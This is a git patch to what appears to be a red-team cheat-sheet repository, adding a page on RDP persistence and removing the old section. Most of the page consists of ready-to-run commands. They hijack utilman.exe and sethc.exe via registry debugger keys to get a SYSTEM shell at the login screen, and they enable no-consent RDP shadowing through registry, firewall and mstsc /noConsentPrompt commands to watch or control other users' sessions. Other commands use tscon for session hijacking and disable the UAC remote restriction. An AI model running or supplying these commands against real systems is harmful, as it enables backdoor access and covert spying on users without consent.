From 348be5931cd13abdcf6739c55d4b86d2c614b0de Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 25 Apr 2024 10:54:54 +0200 Subject: [PATCH] RDP Shadowing --- docs/redteam/persistence/rdp-persistence.md | 100 ++++++++++++++++++ .../persistence/windows-persistence.md | 47 -------- 2 files changed, 100 insertions(+), 47 deletions(-) create mode 100644 docs/redteam/persistence/rdp-persistence.md diff --git a/docs/redteam/persistence/rdp-persistence.md b/docs/redteam/persistence/rdp-persistence.md new file mode 100644 index 0000000..dc0ceb1 --- /dev/null +++ b/docs/redteam/persistence/rdp-persistence.md @@ -0,0 +1,100 @@ +# RDP - Persistence + +## RDP Backdoor + +An RDP backdoor is a malicious technique where an attacker replaces the legitimate binary files of utility manager (utilman.exe) or sticky keys (sethc.exe) with a command prompt (cmd.exe) executable. This allows the attacker to gain unauthorized access to the system by launching a command prompt when the ease of access or sticky keys button is pressed on the login screen, bypassing the need for authentic credentials. + +### utilman.exe + +At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM. + +```powershell +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f +``` + +### sethc.exe + +Hit F5 a bunch of times when you are at the RDP login screen. + +```powershell +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f +``` + + +## RDP Shadowing + +RDP shadowing is a feature of Remote Desktop Protocol (RDP) that allows a remote user to view or control another user's active RDP session on a Windows computer. This feature is typically used for remote assistance, training, or collaboration purposes, allowing one user to observe or take control of another user's desktop, applications, and input devices as if they were physically present at the computer. + + +**Requirements** + +* `TermService` must be running + ```ps1 + sc.exe \\MYSERVER query TermService + sc.exe \\MYSERVER start TermService + ``` +* `SYSTEM` privilege or the account's password + + +**Enable RDP Shadowing** + +Shadow Remote Desktop Session can be enabled by editing the `HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services` registry key. + +| Value | Name | Description | +| ----- | --------------------- | --- | +| 0 | Disable | Remote control is disabled. | +| 1 | EnableInputNotify | The user of remote control has full control of the user's session, with the user's permission. | +| 2 | EnableInputNoNotify | The user of remote control has full control of the user's session; the user's permission is not required. | +| 3 | EnableNoInputNotify | The user of remote control can view the session remotely, with the user's permission; the remote user cannot actively control the session. | +| 4 | EnableNoInputNoNotify | The user of remote control can view the session remotely, but not actively control the session; the user's permission is not required. | + +Usually you want to be able to see and interact with the Remote Desktop: option 2 `EnableInputNoNotify`. + +```ps1 +reg.exe query "\\MYSERVER\HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services" /V Shadow +reg.exe add "\\MYSERVER\HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services" /V Shadow /T REG_DWORD /D 2 /F +``` + +If you encounter any trouble with the network, enable the `Remote Desktop - Shadow (TCP-In)` firewall rule. + +```ps1 +$so = New-CimSessionOption -Protocol Dcom +$s = New-CimSession -ComputerName MYSERVER -SessionOption $so +$fwrule = Get-CimInstance -Namespace ROOT\StandardCimv2 -ClassName MSFT_NetFirewallRule -Filter 'DisplayName="Remote Desktop - Shadow (TCP-In)"' -CimSession $s +$fwrule | Invoke-CimMethod -MethodName Enable +``` + + +**Enumerate active users** + +Query to enumerate active users on the machine. + +```ps1 +quser.exe /SERVER:MYSERVER +query.exe user /server:MYSERVER +qwinsta.exe /server:MYSERVER +``` + + +**Use the shadow mode** + +Use the `noConsentPrompt` parameter and specify the session ID obtained from the previous command. + +```ps1 +MSTSC [/v:] /shadow: [/control] [/noConsentPrompt] +mstsc /v:SRV2016 /shadow:1 /noConsentPrompt +mstsc /v:SRV2016 /shadow:1 /noConsentPrompt /control +``` + +On older version you have to use `tscon.exe` instead. + +```ps1 +psexec -s cmd +cmd /k tscon 2 /dest:console +``` + + +## References + +* [Spying on users using Remote Desktop Shadowing - Living off the Land - Mar 26, 2021 - @bitsadmin](https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing) +* [RDP Hijacking for Lateral Movement with tscon - ired.team - 2019](https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement) \ No newline at end of file diff --git a/docs/redteam/persistence/windows-persistence.md b/docs/redteam/persistence/windows-persistence.md index 579c2de..4e4c733 100644 --- a/docs/redteam/persistence/windows-persistence.md +++ b/docs/redteam/persistence/windows-persistence.md @@ -27,10 +27,6 @@ * [Binary Replacement](#binary-replacement) * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp) * [Binary Replacement on Windows 10+](#binary-replacement-on-windows-10) - * [RDP Backdoor](#rdp-backdoor) - * [utilman.exe](#utilman.exe) - * [sethc.exe](#sethc.exe) - * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) * [Skeleton Key](#skeleton-key) * [Virtual Machines](#virtual-machines) * [Windows Subsystem for Linux](#windows-subsystem-for-linux) @@ -434,49 +430,6 @@ Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** exec Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`. -### RDP Backdoor - -#### utilman.exe - -At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM. - -```powershell -REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f -``` - -#### sethc.exe - -Hit F5 a bunch of times when you are at the RDP login screen. - -```powershell -REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f -``` - -### Remote Desktop Services Shadowing - -:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature. - -Requirements: -* RDP must be running - -```powershell -reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4 -# 4 – View Session without user’s permission. - -# Allowing remote connections to this computer -reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f - - -# Disable UAC remote restriction -reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - -mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt -# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host; -# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowee’s session ID; -# /noconsentprompt parameter allows to bypass a shadowee’s permission and shadow their session without their consent; -# /prompt parameter is used to specify a user’s credentials to connect to a remote host. -``` - ### Skeleton Key > Inject a master password into the LSASS process of a Domain Controller.